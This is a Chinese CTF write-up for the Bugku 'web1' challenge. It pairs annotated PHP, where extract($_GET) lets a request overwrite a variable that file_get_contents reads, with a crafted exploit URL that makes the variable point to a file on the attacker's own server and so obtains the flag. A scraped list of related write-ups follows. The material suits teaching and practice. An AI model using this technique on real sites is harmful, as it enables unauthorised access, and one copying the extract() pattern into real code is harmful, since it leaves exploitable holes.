bugku 新平台 web1 writeup
题目:
看题型主要出题思路是变量覆盖+RFI(远程文件包含)
知识点链接:
变量覆盖:https://www.cnblogs.com/xiaozi/p/7768580.html
远程文件包含:https://blog.csdn.net/sx234com/article/details/88994605
解题过程代码分析;自己按照上面的代码写出来验证一下是最好的解题思路。
<?php
header("Content-type:text/html;charset=utf-8");
include 'flag.php';
//echo var_dump($_GET);
$b='ssAEDsssss';
extract($_GET); //见到extract函数 考虑变量覆盖
if(isset($a)){
$c=trim(file_get_contents($b));
//A 此处 读取$b的值 因为使用了file_get_contents函数则有可能出现RFI远程文件包含漏洞
//B 构造一个远程文件info.txt 放置在我自己的服务器上面 info.txt中内容为 1 远程访问链接为http://自己的域名/info.txt
//C 而$b变量上面已经赋值 见到extract函数 考虑变量覆盖
//D 故 url在构造的时候就可以进行赋值覆盖上面$b='ssAEDsssss'; 的值 利用上面B得到的url 让file_get_contents读取远程info.txt内容1 覆盖变量$b 则$b的值为1
//E 构造URL 如下:http://123.206.31.85:10001/?a=1&b=http://你的域名/readme.txt&c=1 使传入值全部为1 触发成功
echo 'b='.$b.'<br/>';
echo 'a='.$a.'<br/>';
echo 'c='.$c.'<br/>';
if($a==$c){
echo "ok flag is xxx";
}else{
echo '不行没得到!';
}
}
得到的运行结果如下:
bugku 新平台 web1 writeup相关推荐
- Bugku新平台论剑场writeup
头像 用010editor打开搜索flag就是找到的flag:flag{bGxvdmV0aGVnaXJs}再经过base64解密flag{llovethegirl}后再来进行MD5加密得到 flag{ ...
- Bugku旧平台misc writeup
流量分析 flag被盗 打开搜索flag字符串 flag{This_is_a_f10g} 中国菜刀 搜索flag发现flag.tar.gz 找到疑似包到处分组字节流保存为1.gz,rar打开看到fla ...
- Bugku旧平台web writeup
Web基础 Web2 查看网页源代码,搜索flag KEY{Web-2-bugKssNNikls9100} 计算器 审查元素修改输入字符串长度为2 flag{CTF-bugku-0032} web基础 ...
- Bugku旧平台crypto writeup
滴答~滴 摩尔斯电码加密 KEY{BKCTFMISC} 聪明的小羊 栅栏密码 2栏 KEY{sad23jjdsa2} Ok http://127.0.0.1/ook-master/ ook加密 fla ...
- 人——Web3的新平台
由 Jad Esber.Nir Kabessa 和 David Phelps 构思.概述和编辑,David Phelp撰写. 文章翻译:Block unicorn 在Web3中,平台通过成为协议而成功 ...
- Jakarta EE:云原生Java的新平台
\ 看新闻很累?看技术新闻更累?试试下载InfoQ手机客户端,每天上下班路上听新闻,有趣还有料! \ \\ 在今年的JAX大会上,Eclipse基金会的执行董事Mike Milinkovich专门介绍 ...
- 保Cloudera弃Hortonworks,新平台将支持五大云供应商
近日,Cloudera正式完成与Hortonwork的合并,新公司采用Cloudera品牌,新数据平台将支持国际主流的五大公有云平台. 最终,新合并的Cloudera和Hortonworks决定以Cl ...
- TCP协议接入电信物联网AEP(Aiot)新平台
TCP协议接入电信物联网AEP(Aiot)新平台 前言 一.准备工作? 二.使用步骤 计算工具: 1.登录请求 2. 发送数据 3. 指令下发及响应 三.多线程收发数据 总结 前言 电信物联网官网:h ...
- php云扫墓平台_让“云”成为清明祭扫新平台
原标题:让"云"成为清明祭扫新平台 今年清明节未至,许多地方就祭祀工作作出了一些规定,暂停市民现场祭扫.集体公祭.社区公祭.骨灰撒海等群体性活动,提倡通过网络.微信.广播等平台,开 ...
最新文章
- luogu 1471
- Java学习笔记16
- Chat Ban 二分,等差数列(1300)
- c语言随机生成整数存放一维数组_C语言入门教程(十)多维数组
- 谈谈我对正向代理和反向代理的理解
- linux数据泵恢复,Oracle Linux环境中使用数据泵的形式还原Oracle数据库
- java冒泡排序经典代码_15道经典Java算法题(含代码) 建议收藏
- javascript中的继承[二] 基于构造函数(《Object-Oriented JavaScript》第六章)
- jupyter 教程
- 动态链接库dll生成与调用 加密 电脑唯一识别 windows下多个cmd命令输出结果的同时获取 本地时间的处理
- matlab实现布尔真值表的排列,MATLAB在数字电路仿真中的应用
- 《电路(邱关源)》第五版重难点记录(长期更新)
- geos linux编译,geos库交织编译生成ARM平台库
- 微信网页开发(5)--invalid signature/permission denied/offline verifying等错误处理
- HBase2.0中的Benchmark工具 — PerformanceEvaluation
- sqlserver 当 IDENTITY_INSERT 设置为 OFF 时,不能为表 'test' 中的标识列插入显式值...
- 计算机休眠模式是关机吗,电脑中的待机、休眠、睡眠和关机状态的区别。
- MIT6.828学习之homework2:shell
- 简洁的HTML5和CSS3免费企业网站模板源码下载
- VUE实现长时间未操作退出登录
热门文章
- 图像处理之Hadamard变换和Hough变换
- 众多新功能来袭:IntelliJ IDEA 2022.1正式发布
- 【论文精读】Improving Extreme Low-Light Image Denoising via Residual Learning
- shell-手机屏幕录制
- 什么是 IMU?惯性测量单元工作和应用
- 数据格式汇总及type, astype, dtype区别
- linux trac git,trac装配、配置、中文化、支持git(Linux,Mac)
- python+opencv打开大华摄像机视频
- 在线怎么将pdf文件转换成word文档转换器
- 新冠全球曼延风险等级攀升,阿里“生物特征识别多模态融合”价值凸显